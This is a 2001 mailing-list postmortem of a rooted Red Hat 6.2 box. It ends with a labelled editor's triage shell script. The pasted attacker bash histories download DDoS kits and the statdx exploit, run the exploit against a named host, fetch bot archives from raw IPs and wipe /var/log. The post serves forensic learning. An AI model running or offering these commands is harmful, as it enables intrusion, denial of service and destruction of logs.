postmortem

Bob Blick bblick at saber.net
Fri Jan 26 20:58:19 PST 2001


Hi Everyone,

Just thought I'd give y'all an update on my RH6.2 box that was rooted.

Everything in /var/log was deleted. If they had merely emptied the logs, I
would not have noticed them for quite a while, since this is a machine I
put online about 6 months ago in the hopes of turning it into a weather
station and doing some remote robotics type of stuff, but it's basically
been ignored by me. But I have the habit of typing "last -20" whenever I
log in anywhere, and it said something like "wtmp does not exist. perhaps
the log was deleted". At that point I checked /var/log and saw there were
no logs at all and shut the machine down.

Today I brought the machine to my office and fired it up. /home showed new
directories "cgi" and "guest".

/etc/passwd and /etc/shadow showed a new user "cgi" and /etc/shadow- and
/etc/passwd- showed them plus user "tmp".

/etc/group and /etc/gshadow were normal, but /etc/group- and /etc/gshadow-
showed group "tmp".

In /root there was a .BitchX directory full of source code, and a Makefile.
I found evidence of programs untarred and compiled in a few directories. In
/tmp there was .xdcc, iroffer, and something called "cool" that was a
binary executable with no source so I don't know what it is, and there was
no clear text in the binary.

In the /home/httpd/cgi-bin directory there was a program called "...". That
is three dots. It's a binary, about 13k in size, and had some text in it,
with html pronouncing itself to be a backdoor program executor. Cute, just
hop in with a browser now.

User "stan" is a valid account of a new user who has never logged in, but
in his directory there is a new directory "stacheldrahtV4" and it's been
compiled. Looks like a nasty program with all sorts of devious features.
Subdirectories include "blowfish", "tubby", and "telnetc".

I scanned the source of a lot of these programs, and it looks like they got
into the machine by exploiting rpc.statd. Never knew what that program was
for; you'd better believe I will make damn sure it never gets into anything
of mine ever again.

I found an ncftp.conf file in one of the directories, forget which one.

OK, so they weren't very good about cleaning up, and had deleted the logs,
so I don't know where they came from. However, one thing they didn't clean
up was the .bash_history files! I am including them now for your pleasure.
At the end of root's you will see where I logged in and shut the machine
down, then after I logged in today I did very little before exploring with
mc(midnight commander). I haven't deleted anything or reformatted yet, so
if anyone has any suggestions of more things to do I can still do it.

Cheerful regards,

Bob Blick

root's .bash_history, looks like a lot rolled off the top:
rm -rf *.c
rm -rf execute_me
rm -rf s.sh
whereis irc
whereis BitchX
ftp ftp..bitchx.org
ftp ftp.bitchx.org
ls
gzip -d wget-1.5.3.tar.gz
tar -xf wget-1.5.3.tar
ls
rm *.tar
gzip -d ircii-pana-1.0c18.tar.gz
tar -xf ircii-pana-1.0c18.tar
ls
tar -xf ircii-pana-1.0c18.tar
ls
cd BitchX
ls
./configure
lls
make install
ls
cd ..
ls
rm -rf *.tar
rm -rf BitchX
cd wget-1.5.3
./configure
make install
cd ..
ls
rm -rf wg*
ls
ls
ftp ftp.bitchx.org
ls
gzip -d t.tar.gz
tar -xf t.tar
cd BitchX
./configure
make install
ls
ps -aux
cat /rpoc/cpuinfo
cat /proc/cpuinfo
make install
ps -aux
kill -9 9908
ls
whereis BitchX
BitchX gay irc.aohell.org
su games
ls
exit
last -20
tail /var/log/messages
mc
date
exit
/sbin/shutdown -h now
exit
last -20
mc

Now the "guest" .bash_history:
cd /tmp
ncftpget -u temp -p xdcc 24.15.103.218 . 'crpt3.tgz'
tar xzvf crpt3.tgz 
rm crpt3.tgz 
cd .crpt
pico egg.conf
./setup
cd ..
rm -rf .crpt/
exit
w
cd /tmp
ncftpget -u temp -p xdcc 24.14.254.96 . 'xdcc.tgz'
tar xzvf xdcc.tgz 
rm xdcc.tgz 
cd .xdcc
pico corrupt.conf 
TERM=vt100
pico corrupt.conf 
df -H
./iroffer -b corrupt.conf 
telnet 204.170.52.1
telnet 204.168.155.2
telnet 203.75.170.12
telnet ns1.sharpweb.net
cd /tmp
cd .xdcc
ls
pico corrupt.conf 
killall -9 iroffer
./iroffer -b corrupt.conf 
telnet cluster1.tel.uva.es
exit

Lots of addresses there; one was in Australia, one was in Taiwan, and you
see the one in Spain. Probably they had no right to be in any of them.

The .bash_history for "cgi" was one line:
free
I hope they were disappointed to find only 32 meg ram.

Finally, the .bash_history in /home/ftp:
cd /home
ls
cd guest
l
ls
cd guest
ls
ls -al
cd ..
ls
cd /tmp
ls -al
cd .xdcc
ls
pico corrupt.conf
ls
./iroffer
./iroffer corrupt.conf
ls
cd ..
ls
cd ..
ls
cd /home
ls
ls -al
cd guest
ls
 -al
ls -al
cd .ncftp
ls
ls -al
cd firewall
ls
cd ..
cd ..
ls
cd cgi
ls
ls -al
cd ..
cd bob
ls -al
cd ..
ls
cd stan
ls
ls -al
ls
ls -al
ls
wget
file:///C:/Documents%20and%20Settings/DUKE/Desktop/www.hack.co.za.tar/www.hack.co.za/dos/ddos/stachel-yps.tar.gz
wget www.hack.co.za.tar/www.hack.co.za/dos/ddos/stachel-yps.tar.gz
wget www.hack.co.za/www.hack.co.za/dos/ddos/stachel-yps.tar.gz
wget http://packetstorm.securify.com/distributed/stachel.tgz
gzip -d stachel.tgz
tar -xf stachel.tar
ls
cd 
cd stacheldrahtV4
cd /tmp
sl
ls
cd .tmp
ls
find stacheldrahtV4
\
locate stacheldrahtV4
find stacheldrahtV4
locate stacheldrahtV4
ls
ls
ls -al
cd .xdcc
ls
cd /home
ls
cd guest
ls
ls -al
cd /
ls
ls /tmp
ls -al
cd BitchX
ls
cd /tmp
ls
wget http://packetstorm.securify.com/distributed/stachel.tgz
gzip -d stachel.tgz
tar -xf stachel.tar
ls
cd stacheldrahtV4 
ls
make
ls
./telnetc
cd telnetc
ls
make
./client
./sclient
ls
./client
ls
cd ..
ls
./mserv
ps -x
ls
kill -9 9685 9686
ls
cd mserv
cd leaf
ls
make
/usr/sbin/adduser tmp
passwd tmp
ls
pass tmp
passwd tmp
ps -x
/usr/sbin/userdel tmp
wget http://packetstorm.securify.com/distributed/tfn2k.tgz
ls
cd ..
ls
cd ..
ls
rm -rf st*
rm t.tar
wget http://packetstorm.securify.com/distributed/tfn2k.tgz
gzip -d tfn2k.tgz
tar -xf tfn2k.tar
cd tfn2k
ls
make
su root
kill -9 6073
users
su root
su root
exit
rm -rf tfn*
mkdir .tmp
cd .tmp
ls
wget http://packetstorm.securify.com/Exploit_Code_Archive/statdx86.c
gcc statdx86.c -o st
./st
wget http://packetstorm.securify.com/0008-exploits/statdx.c
gcc statdx.c -o statdx
./statdx
./statdx -h
./statdx -d 0 danegus.vpsa.buffalo.edu
exit
rm -rf /var/log/*
exit
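Added example (editor's addition, not part of Bob's post and not code found on the machine): a small POSIX shell triage script that replays the checks the post walks through against a constructed fixture rather than a live box. It flags a missing wtmp and an emptied /var/log (what "last -20" tripped over), lists accounts that appear in /etc/passwd- or /etc/group- but not in the live file (how the deleted "tmp" user showed up), and finds hidden dot-directories under /tmp and /home plus cgi-bin entries whose names are nothing but dots (the "..." backdoor). Function names, the report wording and the fixture contents are all my own; the fixture only mimics the layout the post describes. It uses cut, sort, comm, find -prune, sed and mktemp, which exist on any Linux or BSD userland.

```shell
#!/bin/sh
# Added triage example; not from the original post. Every path is taken
# relative to ROOT so the same functions can be pointed at a mounted image.

# Accounts that differ between passwd/group and the backup copy (passwd-,
# group-) that the shadow tools write before each change. A name present in
# the backup but absent from the live file was created and later deleted.
account_diff() {
    root="$1"
    for f in passwd group; do
        cur="$root/etc/$f"; bak="$root/etc/$f-"
        if [ -f "$cur" ] && [ -f "$bak" ]; then
            cut -d: -f1 "$cur" | sort > "$root/.cur.$$"
            cut -d: -f1 "$bak" | sort > "$root/.bak.$$"
            comm -13 "$root/.cur.$$" "$root/.bak.$$" | sed "s/^/$f: removed since backup: /"
            comm -23 "$root/.cur.$$" "$root/.bak.$$" | sed "s/^/$f: added since backup: /"
            rm -f "$root/.cur.$$" "$root/.bak.$$"
        fi
    done
}

# Log-wipe indicators: no wtmp means last(1) has nothing to show.
log_check() {
    root="$1"
    if [ ! -f "$root/var/log/wtmp" ]; then echo "wtmp missing"; fi
    if [ -z "$(find "$root/var/log" -type f 2>/dev/null)" ]; then
        echo "/var/log has no files"
    fi
}

# Hidden directories under /tmp and /home (.xdcc, .crpt, .tmp, .ncftp in the
# post) and cgi-bin files whose names consist only of dots ("...").
hidden_scan() {
    root="$1"
    find "$root/tmp" "$root/home" -name '.?*' -type d -prune -print 2>/dev/null \
        | sed "s|^$root||" | sed 's/^/hidden dir: /'
    find "$root/home/httpd/cgi-bin" -type f -name '.*' ! -name '*[!.]*' 2>/dev/null \
        | sed "s|^$root||" | sed 's/^/dot-only name in cgi-bin: /'
}

# Full report for one root. Always returns 0 so callers under set -e survive.
triage() {
    log_check "$1"
    account_diff "$1"
    hidden_scan "$1"
    return 0
}

# Constructed fixture modelled on the post's findings (not real data):
# "cgi" added, "tmp" created then deleted, /var/log wiped, hidden dirs, "...".
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/var/log" "$root/tmp/.xdcc" \
             "$root/home/guest/.ncftp/firewall" "$root/home/httpd/cgi-bin"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'bob:x:500:500::/home/bob:/bin/bash' \
        'cgi:x:501:501::/home/cgi:/bin/bash' > "$root/etc/passwd"
    # passwd- still holds the "tmp" account that userdel removed from passwd
    { cat "$root/etc/passwd"; echo 'tmp:x:502:502::/home/tmp:/bin/bash'; } > "$root/etc/passwd-"
    printf '%s\n' 'root:x:0:' 'bob:x:500:' 'cgi:x:501:' > "$root/etc/group"
    { cat "$root/etc/group"; echo 'tmp:x:502:'; } > "$root/etc/group-"
    : > "$root/home/httpd/cgi-bin/..."   # the three-dot "backdoor program executor"
    # /var/log is left empty, as "rm -rf /var/log/*" would leave it
    echo "$root"
}

# Usage: ./triage.sh --demo   (or call: triage /mnt/image for a mounted disk)
if [ "${1:-}" = "--demo" ]; then
    root=$(make_fixture)
    triage "$root"
    rm -rf "$root"
fi
```

On a real image, compare the account_diff output against a known-good account list as well: an account the attacker added before the last passwd- snapshot (like "cgi" here) is present in both files and will not show up in the diff.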
